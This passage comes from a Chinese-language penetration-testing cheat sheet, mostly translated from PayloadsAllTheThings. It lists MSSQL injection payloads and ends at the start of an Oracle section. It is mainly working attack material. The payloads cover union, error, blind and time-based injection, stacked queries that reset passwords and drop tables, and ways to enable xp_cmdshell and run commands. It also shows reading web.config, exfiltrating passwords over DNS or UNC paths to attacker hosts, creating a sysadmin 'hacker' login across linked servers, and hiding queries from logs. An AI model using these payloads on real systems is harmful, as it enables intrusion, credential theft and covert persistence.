注释</td></tr><tr><td>​<code>;%00</code>​</td><td>Null byte</td></tr></tbody></table><h3 id="MSSQL-用户"><a href="#MSSQL-用户" class="headerlink" title="MSSQL 用户"></a>MSSQL 用户</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">SELECT CURRENT_USER</span><br><span class="line">SELECT user_name();</span><br><span class="line">SELECT system_user;</span><br><span class="line">SELECT user;</span><br></pre></td></tr></table></figure><h3 id="MSSQL-版本查看"><a href="#MSSQL-版本查看" class="headerlink" title="MSSQL 版本查看"></a>MSSQL 版本查看</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT @@version</span><br></pre></td></tr></table></figure><h3 id="MSSQL-主机名"><a href="#MSSQL-主机名" class="headerlink" title="MSSQL 主机名"></a>MSSQL 主机名</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">SELECT HOST_NAME()</span><br><span class="line">SELECT @@hostname</span><br><span class="line">SELECT @@SERVERNAME</span><br><span class="line">SELECT SERVERPROPERTY(&#x27;productversion&#x27;)</span><br><span class="line">SELECT SERVERPROPERTY(&#x27;productlevel&#x27;)</span><br><span class="line">SELECT SERVERPROPERTY(&#x27;edition&#x27;);</span><br></pre></td></tr></table></figure><h3 id="MSSQL-数据库名"><a href="#MSSQL-数据库名" class="headerlink" title="MSSQL 数据库名"></a>MSSQL 数据库名</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT DB_NAME()</span><br></pre></td></tr></table></figure><h3 id="MSSQL-数据库凭证"><a href="#MSSQL-数据库凭证" class="headerlink" title="MSSQL 数据库凭证"></a>MSSQL 数据库凭证</h3><ul><li><strong>MSSQL 2000</strong>: Hashcat mode 131: <code>0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578</code>​<br>​<code>sql SELECT name, password FROM master..sysxlogins SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer</code>​</li><li><strong>MSSQL 2005</strong>: Hashcat mode 132: <code>0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe</code>​<br>​<code>sql SELECT name, password_hash FROM master.sys.sql_logins SELECT name + &#39;-&#39; + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins</code>​</li></ul><h3 id="MSSQL-列出数据库"><a href="#MSSQL-列出数据库" class="headerlink" title="MSSQL 列出数据库"></a>MSSQL 列出数据库</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">SELECT name FROM master..sysdatabases;</span><br><span class="line">SELECT DB_NAME(N); — for N = 0, 1, 2, …</span><br><span class="line">SELECT STRING_AGG(name, &#x27;, &#x27;) FROM master..sysdatabases; -- Change delimeter value such as &#x27;, &#x27; to anything else you want =&gt; master, tempdb, model, msdb   (Only works in MSSQL 2017+)</span><br></pre></td></tr></table></figure><h3 id="MSSQL-列出列"><a href="#MSSQL-列出列" class="headerlink" title="MSSQL 列出列"></a>MSSQL 列出列</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only</span><br><span class="line">SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable</span><br><span class="line"></span><br><span class="line">SELECT table_catalog, column_name FROM information_schema.columns</span><br></pre></td></tr></table></figure><h3 id="MSSQL-列出表"><a href="#MSSQL-列出表" class="headerlink" title="MSSQL 列出表"></a>MSSQL 列出表</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views</span><br><span class="line">SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;</span><br><span class="line">SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable</span><br><span class="line"></span><br><span class="line">SELECT table_catalog, table_name FROM information_schema.columns</span><br><span class="line">SELECT STRING_AGG(name, &#x27;, &#x27;) FROM master..sysobjects WHERE xtype = &#x27;U&#x27;; -- Change delimeter value such as &#x27;, &#x27; to anything else you want =&gt; trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options  (Only works in MSSQL 2017+)</span><br></pre></td></tr></table></figure><h3 id="MSSQL-联合注入"><a href="#MSSQL-联合注入" class="headerlink" title="MSSQL 联合注入"></a>MSSQL 联合注入</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">-- extract databases names</span><br><span class="line">$ SELECT name FROM master..sysdatabases</span><br><span class="line">[*] Injection</span><br><span class="line">[*] msdb</span><br><span class="line">[*] tempdb</span><br><span class="line"></span><br><span class="line">-- extract tables from Injection database</span><br><span class="line">$ SELECT name FROM Injection..sysobjects WHERE xtype = &#x27;U&#x27;</span><br><span class="line">[*] Profiles</span><br><span class="line">[*] Roles</span><br><span class="line">[*] Users</span><br><span class="line"></span><br><span class="line">-- extract columns for the table Users</span><br><span class="line">$ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = &#x27;Users&#x27;)</span><br><span class="line">[*] UserId</span><br><span class="line">[*] UserName</span><br><span class="line"></span><br><span class="line">-- Finally extract the data</span><br><span class="line">$ SELECT  UserId, UserName from Users</span><br></pre></td></tr></table></figure><h3 id="MSSQL-报错注入"><a href="#MSSQL-报错注入" class="headerlink" title="MSSQL 报错注入"></a>MSSQL 报错注入</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">For integer inputs : convert(int,@@version)</span><br><span class="line">For integer inputs : cast((SELECT @@version) as int)</span><br><span class="line"></span><br><span class="line">For string inputs   : &#x27; + convert(int,@@version) + &#x27;</span><br><span class="line">For string inputs   : &#x27; + cast((SELECT @@version) as int) + &#x27;</span><br></pre></td></tr></table></figure><h3 id="MSSQL-盲注"><a href="#MSSQL-盲注" class="headerlink" title="MSSQL 盲注"></a>MSSQL 盲注</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- -</span><br><span class="line"></span><br><span class="line">AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97</span><br><span class="line">AND UNICODE(SUBSTRING((SELECT &#x27;A&#x27;),1,1))&gt;64-- </span><br><span class="line">AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables &gt; &#x27;A&#x27;</span><br><span class="line"></span><br><span class="line">AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)&gt;90</span><br><span class="line"></span><br><span class="line">SELECT @@version WHERE @@version LIKE &#x27;%12.0.2000.8%&#x27;</span><br><span class="line"></span><br><span class="line">WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)</span><br><span class="line">SELECT message FROM data WHERE row = 1 and message like &#x27;t%&#x27;</span><br></pre></td></tr></table></figure><h3 id="MSSQL-时间注入"><a href="#MSSQL-时间注入" class="headerlink" title="MSSQL 时间注入"></a>MSSQL 时间注入</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">ProductID=1;waitfor delay &#x27;0:0:10&#x27;--</span><br><span class="line">ProductID=1);waitfor delay &#x27;0:0:10&#x27;--</span><br><span class="line">ProductID=1&#x27;;waitfor delay &#x27;0:0:10&#x27;--</span><br><span class="line">ProductID=1&#x27;);waitfor delay &#x27;0:0:10&#x27;--</span><br><span class="line">ProductID=1));waitfor delay &#x27;0:0:10&#x27;--</span><br><span class="line"></span><br><span class="line">IF([INFERENCE]) WAITFOR DELAY &#x27;0:0:[SLEEPTIME]&#x27;</span><br><span class="line">IF 1=1 WAITFOR DELAY &#x27;0:0:5&#x27; ELSE WAITFOR DELAY &#x27;0:0:0&#x27;;</span><br></pre></td></tr></table></figure><h3 id="MSSQL-堆栈查询"><a href="#MSSQL-堆栈查询" class="headerlink" title="MSSQL 堆栈查询"></a>MSSQL 堆栈查询</h3><ul><li>Without any statement terminator <code>-- multiple SELECT statements SELECT &#39;A&#39;SELECT &#39;B&#39;SELECT &#39;C&#39; -- updating password with a stacked query SELECT id, username, password FROM users WHERE username = &#39;admin&#39;exec(&#39;update[users]set[password]=&#39;&#39;a&#39;&#39;&#39;)-- -- using the stacked query to enable xp_cmdshell -- you won&#39;t have the output of the query, redirect it to a file SELECT id, username, password FROM users WHERE username = &#39;admin&#39;exec(&#39;sp_configure&#39;&#39;show advanced option&#39;&#39;,&#39;&#39;1&#39;&#39;reconfigure&#39;)exec(&#39;sp_configure&#39;&#39;xp_cmdshell&#39;&#39;,&#39;&#39;1&#39;&#39;reconfigure&#39;)--</code>​</li><li>Use a semi-colon “;” to add another query<br>​<code>sql ProductID=1; DROP members--</code>​</li></ul><h3 id="MSSQL-读取文件"><a href="#MSSQL-读取文件" class="headerlink" title="MSSQL 读取文件"></a>MSSQL 读取文件</h3><p><strong>Permissions</strong>: The <code>BULK</code>​ option requires the <code>ADMINISTER BULK OPERATIONS</code>​ or the <code>ADMINISTER DATABASE BULK OPERATIONS</code>​ permission.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">-1 union select null,(select x from OpenRowset(BULK &#x27;C:\Windows\win.ini&#x27;,SINGLE_CLOB) R(x)),null,null</span><br></pre></td></tr></table></figure><h3 id="MSSQL-命令执行"><a href="#MSSQL-命令执行" class="headerlink" title="MSSQL 命令执行"></a>MSSQL 命令执行</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">EXEC xp_cmdshell &quot;net user&quot;;</span><br><span class="line">EXEC master.dbo.xp_cmdshell &#x27;cmd.exe dir c:&#x27;;</span><br><span class="line">EXEC master.dbo.xp_cmdshell &#x27;ping 127.0.0.1&#x27;;</span><br></pre></td></tr></table></figure><p>重新激活 xp_cmdshell（在 SQL Server 2005 中默认禁用）</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">EXEC sp_configure &#x27;show advanced options&#x27;,1;</span><br><span class="line">RECONFIGURE;</span><br><span class="line">EXEC sp_configure &#x27;xp_cmdshell&#x27;,1;</span><br><span class="line">RECONFIGURE;</span><br></pre></td></tr></table></figure><p>与 MSSQL 实例交互。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sqsh -S 192.168.1.X -U sa -P superPassword</span><br><span class="line">python mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758</span><br></pre></td></tr></table></figure><p>执行 Python 脚本</p><blockquote><p>由与使用 xp_cmdshell 执行命令的用户不同的用户执行</p></blockquote><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">#Print the user being used (and execute commands)</span><br><span class="line">EXECUTE sp_execute_external_script @language = N&#x27;Python&#x27;, @script = N&#x27;print(__import__(&quot;getpass&quot;).getuser())&#x27;</span><br><span class="line">EXECUTE sp_execute_external_script @language = N&#x27;Python&#x27;, @script = N&#x27;print(__import__(&quot;os&quot;).system(&quot;whoami&quot;))&#x27;</span><br><span class="line">#Open and read a file</span><br><span class="line">EXECUTE sp_execute_external_script @language = N&#x27;Python&#x27;, @script = N&#x27;print(open(&quot;C:\\inetpub\\wwwroot\\web.config&quot;, &quot;r&quot;).read())&#x27;</span><br><span class="line">#Multiline</span><br><span class="line">EXECUTE sp_execute_external_script @language = N&#x27;Python&#x27;, @script = N&#x27;</span><br><span class="line">import sys</span><br><span class="line">print(sys.version)</span><br><span class="line">&#x27;</span><br><span class="line">GO</span><br></pre></td></tr></table></figure><h3 id="MSSQL-外带数据"><a href="#MSSQL-外带数据" class="headerlink" title="MSSQL 外带数据"></a>MSSQL 外带数据</h3><h4 id="MSSQL-DNS-外带数据"><a href="#MSSQL-DNS-外带数据" class="headerlink" title="MSSQL DNS 外带数据"></a>MSSQL DNS 外带数据</h4><p>Technique from <a href="https://twitter.com/ptswarm/status/1313476695295512578/photo/1">https://twitter.com/ptswarm/status/1313476695295512578/photo/1</a></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># Permissions: Requires VIEW SERVER STATE permission on the server.</span><br><span class="line">1 and exists(select * from fn_xe_file_target_read_file(&#x27;C:\*.xel&#x27;,&#x27;\\&#x27;%2b(select pass from users where id=1)%2b&#x27;.xxxx.burpcollaborator.net\1.xem&#x27;,null,null))</span><br><span class="line"></span><br><span class="line"># Permissions: Requires the CONTROL SERVER permission.</span><br><span class="line">1 (select 1 where exists(select * from fn_get_audit_file(&#x27;\\&#x27;%2b(select pass from users where id=1)%2b&#x27;.xxxx.burpcollaborator.net\&#x27;,default,default)))</span><br><span class="line">1 and exists(select * from fn_trace_gettable(&#x27;\\&#x27;%2b(select pass from users where id=1)%2b&#x27;.xxxx.burpcollaborator.net\1.trc&#x27;,default))</span><br></pre></td></tr></table></figure><h4 id="MSSQL-UNC-路径"><a href="#MSSQL-UNC-路径" class="headerlink" title="MSSQL UNC 路径"></a>MSSQL UNC 路径</h4><p>MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the <code>xp_dirtree</code>​ function to list the files in our SMB share and grab the NTLMv2 hash.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;; use master; exec xp_dirtree &#x27;\\10.10.15.XX\SHARE&#x27;;-- </span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">xp_dirtree &#x27;\\attackerip\file&#x27;</span><br><span class="line">xp_fileexist &#x27;\\attackerip\file&#x27;</span><br><span class="line">BACKUP LOG [TESTING] TO DISK = &#x27;\\attackerip\file&#x27;</span><br><span class="line">BACKUP DATABASE [TESTING] TO DISK = &#x27;\\attackeri\file&#x27;</span><br><span class="line">RESTORE LOG [TESTING] FROM DISK = &#x27;\\attackerip\file&#x27;</span><br><span class="line">RESTORE DATABASE [TESTING] FROM DISK = &#x27;\\attackerip\file&#x27;</span><br><span class="line">RESTORE HEADERONLY FROM DISK = &#x27;\\attackerip\file&#x27;</span><br><span class="line">RESTORE FILELISTONLY FROM DISK = &#x27;\\attackerip\file&#x27;</span><br><span class="line">RESTORE LABELONLY FROM DISK = &#x27;\\attackerip\file&#x27;</span><br><span class="line">RESTORE REWINDONLY FROM DISK = &#x27;\\attackerip\file&#x27;</span><br><span class="line">RESTORE VERIFYONLY FROM DISK = &#x27;\\attackerip\file&#x27;</span><br></pre></td></tr></table></figure><h4 id="MSSQL-提升权限为-DB-管理员"><a href="#MSSQL-提升权限为-DB-管理员" class="headerlink" title="MSSQL 提升权限为 DB 管理员"></a>MSSQL 提升权限为 DB 管理员</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">EXEC master.dbo.sp_addsrvrolemember &#x27;user&#x27;, &#x27;sysadmin;</span><br></pre></td></tr></table></figure><h4 id="MSSQL-受信任链接"><a href="#MSSQL-受信任链接" class="headerlink" title="MSSQL 受信任链接"></a>MSSQL 受信任链接</h4><blockquote><p>The links between databases work even across forest trusts.</p></blockquote><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">msf&gt; use exploit/windows/mssql/mssql_linkcrawler</span><br><span class="line">[msf&gt; set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter sessio</span><br></pre></td></tr></table></figure><p>Manual exploitation</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">-- find link</span><br><span class="line">select * from master..sysservers</span><br><span class="line"></span><br><span class="line">-- execute query through the link</span><br><span class="line">select * from openquery(&quot;dcorp-sql1&quot;, &#x27;select * from master..sysservers&#x27;)</span><br><span class="line">select version from openquery(&quot;linkedserver&quot;, &#x27;select @@version as version&#x27;);</span><br><span class="line"></span><br><span class="line">-- chain multiple openquery</span><br><span class="line">select version from openquery(&quot;link1&quot;,&#x27;select version from openquery(&quot;link2&quot;,&quot;select @@version as version&quot;)&#x27;)</span><br><span class="line"></span><br><span class="line">-- execute shell commands</span><br><span class="line">EXECUTE(&#x27;sp_configure &#x27;&#x27;xp_cmdshell&#x27;&#x27;,1;reconfigure;&#x27;) AT LinkedServer</span><br><span class="line">select 1 from openquery(&quot;linkedserver&quot;,&#x27;select 1;exec master..xp_cmdshell &quot;dir c:&quot;&#x27;)</span><br><span class="line"></span><br><span class="line">-- create user and give admin privileges</span><br><span class="line">EXECUTE(&#x27;EXECUTE(&#x27;&#x27;CREATE LOGIN hacker WITH PASSWORD = &#x27;&#x27;&#x27;&#x27;P@ssword123.&#x27;&#x27;&#x27;&#x27; &#x27;&#x27;) AT &quot;DOMINIO\SERVER1&quot;&#x27;) AT &quot;DOMINIO\SERVER2&quot;</span><br><span class="line">EXECUTE(&#x27;EXECUTE(&#x27;&#x27;sp_addsrvrolemember &#x27;&#x27;&#x27;&#x27;hacker&#x27;&#x27;&#x27;&#x27; , &#x27;&#x27;&#x27;&#x27;sysadmin&#x27;&#x27;&#x27;&#x27; &#x27;&#x27;) AT &quot;DOMINIO\SERVER1&quot;&#x27;) AT &quot;DOMINIO\SERVER2&quot;</span><br></pre></td></tr></table></figure><h4 id="列出权限"><a href="#列出权限" class="headerlink" title="列出权限"></a>列出权限</h4><h5 id="列出当前用户在服务器上的有效权限。"><a href="#列出当前用户在服务器上的有效权限。" class="headerlink" title="列出当前用户在服务器上的有效权限。"></a>列出当前用户在服务器上的有效权限。</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM fn_my_permissions(NULL, &#x27;SERVER&#x27;); </span><br></pre></td></tr></table></figure><h5 id="列出当前用户在数据库上的有效权限。"><a href="#列出当前用户在数据库上的有效权限。" class="headerlink" title="列出当前用户在数据库上的有效权限。"></a>列出当前用户在数据库上的有效权限。</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM fn_my_permissions (NULL, &#x27;DATABASE&#x27;);</span><br></pre></td></tr></table></figure><h5 id="列出当前用户在视图上的有效权限。"><a href="#列出当前用户在视图上的有效权限。" class="headerlink" title="列出当前用户在视图上的有效权限。"></a>列出当前用户在视图上的有效权限。</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM fn_my_permissions(&#x27;Sales.vIndividualCustomer&#x27;, &#x27;OBJECT&#x27;) ORDER BY subentity_name, permission_name; </span><br></pre></td></tr></table></figure><h5 id="检查当前用户是否属于指定的服务器角色。"><a href="#检查当前用户是否属于指定的服务器角色。" class="headerlink" title="检查当前用户是否属于指定的服务器角色。"></a>检查当前用户是否属于指定的服务器角色。</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">-- possible roles: sysadmin, serveradmin, dbcreator, setupadmin, bulkadmin, securityadmin, diskadmin, public, processadmin</span><br><span class="line">SELECT is_srvrolemember(&#x27;sysadmin&#x27;);</span><br></pre></td></tr></table></figure><p>在查询中使用 <code>SP_PASSWORD</code>​ 以隐藏日志，如：<code>&#39; AND 1=1--sp_password</code>​</p><h4 id="MSSQL-OPSEC"><a href="#MSSQL-OPSEC" class="headerlink" title="MSSQL OPSEC"></a>MSSQL OPSEC</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">-- &#x27;sp_password&#x27; was found in the text of this event.</span><br><span class="line">-- The text has been replaced with this comment for security reasons.</span><br></pre></td></tr></table></figure><h3 id="References"><a href="#References" class="headerlink" title="References"></a>References</h3><blockquote><p>注：大部分内容翻译至：<a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL3N3aXNza3lyZXBvL1BheWxvYWRzQWxsVGhlVGhpbmdz">https://github.com/swisskyrepo/PayloadsAllTheThings</a></p></blockquote><ul><li><a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly93d3cuY25ibG9ncy5jb20vamVycnlsb2NrZXIvcC8xMDkzODg5OS5odG1s">MSSQL渗透测试</a></li><li><a href="http://doc.vulexp.cn/?golink=aHR0cDovL3BlbnRlc3Rtb25rZXkubmV0L2NoZWF0LXNoZWV0L3NxbC1pbmplY3Rpb24vbXNzcWwtc3FsLWluamVjdGlvbi1jaGVhdC1zaGVldA==">Pentest Monkey – mssql-sql-injection-cheat-sheet</a></li><li><a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL2luY3JlZGlibGVpbmRpc2hlbGwvZXhwbG9pdC1jb2RlLWJ5LW1lL2Jsb2IvbWFzdGVyL01TU1FMJTIwRXJyb3ItQmFzZWQlMjBTUUwlMjBJbmplY3Rpb24lMjBPcmRlciUyMGJ5JTIwY2xhdXNlL0Vycm9yJTIwYmFzZWQlMjBTUUwlMjBJbmplY3Rpb24lMjBpbiUyMOKAnE9yZGVyJTIwQnnigJ0lMjBjbGF1c2UlMjAoTVNTUUwpLnBkZg==">Error Based – SQL Injection</a></li><li><a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9ib29rLmhhY2t0cmlja3MueHl6L3dpbmRvd3MvYWN0aXZlLWRpcmVjdG9yeS1tZXRob2RvbG9neS9tc3NxbC10cnVzdGVkLWxpbmtz">MSSQL Trusted Links – HackTricks.xyz</a></li><li><a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9ibG9nLm5ldHNwaS5jb20vaG93LXRvLWhhY2stZGF0YWJhc2UtbGlua3MtaW4tc3FsLXNlcnZlci8=">SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! – Antti Rantasaari – June 6th, 2013</a></li><li><a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL05ldFNQSS9EQUZU">DAFT: Database Audit Framework &amp; Toolkit – NetSPI</a></li><li><a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXN0LmdpdGh1Yi5jb20vbnVsbGJpbmQvN2RmY2EyYTYzMDlhNDIwOWI1YWVlZjE4MWI2NzZjNmU=">SQL Server UNC Path Injection Cheatsheet – nullbind</a></li><li><a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly93d3cuZXhwbG9pdC1kYi5jb20vcGFwZXJzLzEyOTc1">Full MSSQL Injection PWNage – ZeQ3uL &amp;&amp; JabAv0C – 28 January 2009</a></li><li><a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9kb2NzLm1pY3Jvc29mdC5jb20vZW4tdXMvc3FsL3JlbGF0aW9uYWwtZGF0YWJhc2VzL3N5c3RlbS1mdW5jdGlvbnMvc3lzLWZuLW15LXBlcm1pc3Npb25zLXRyYW5zYWN0LXNxbD92aWV3PXNxbC1zZXJ2ZXItdmVyMTU=">Microsoft – sys.fn_my_permissions (Transact-SQL)</a></li><li><a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9kb2NzLm1pY3Jvc29mdC5jb20vZW4tdXMvc3FsL3Qtc3FsL2Z1bmN0aW9ucy9pcy1zcnZyb2xlbWVtYmVyLXRyYW5zYWN0LXNxbD92aWV3PXNxbC1zZXJ2ZXItdmVyMTU=">Microsoft – IS_SRVROLEMEMBER (Transact-SQL)</a></li><li><a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly93d3cuZ29zZWN1cmUubmV0L2Jsb2cvMjAyMy8wNi8yMS9hd3Mtd2FmLWNsaWVudHMtbGVmdC12dWxuZXJhYmxlLXRvLXNxbC1pbmplY3Rpb24tZHVlLXRvLXVub3J0aG9kb3gtbXNzcWwtZGVzaWduLWNob2ljZS8=">AWS WAF Clients Left Vulnerable to SQL Injection Due to Unorthodox MSSQL Design Choice – Marc Olivier Bergeron – Jun 21, 2023</a></li></ul><h2 id="oracle"><a href="#oracle" class="headerlink" title="oracle"></a>oracle</h2><p>相关工具：</p><ul><li><a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL1NhZmVHcm9jZXJ5U3RvcmUvTURVVA==">MDUT</a></li></ul><h3 id="oracle查最大数量表"><a href="#oracle查最大数量表" class="headerlink" title="oracle查最大数量表"></a>oracle查最大数量表</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">select t.table_name,t.tablespace_name,t.owner,t.num_rows from  all_tables t  ORDER BY NUM_ROWS DESC;</span><br><span class="line"></span><br><span class="line">select t.table_name,t.tablespace_name,t.owner,t.num_rows from  all_tables t  ORDER BY NUM_ROWS DESC;</span><br><span class="line">select t.table_name tableName, f.comments comments</span><br><span class="line">  from user_tables t</span><br><span class="line"> inner join user_tab_comments f</span><br><span class="line">    on t.table_name = f.table_name</span><br></pre></td></tr></table></figure><h3 id="查询包含-user-字段在哪个库哪个表"><a href="#查询包含-user-字段在哪个库哪个表" class="headerlink" title="查询包含 user 字段在哪个库哪个表"></a>查询包含 user 字段在哪个库哪个表</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">SELECT </span><br><span class="line">    owner AS database_name,</span><br><span class="line">    table_name,</span><br><span class="line">    column_name</span><br><span class="line">FROM </span><br><span class="line">    all_tab_columns</span><br><span class="line">WHERE </span><br><span class="line">    column_name LIKE &#x27;%USER%&#x27;</span><br><span class="line">ORDER BY </span><br><span class="line">    owner, table_name, column_name;</span><br></pre></td></tr></table></figure><h3 id="Oracle-SQL-默认数据库"><a href="#Oracle-SQL-默认数据库" class="headerlink" title="Oracle SQL 默认数据库"></a>Oracle SQL 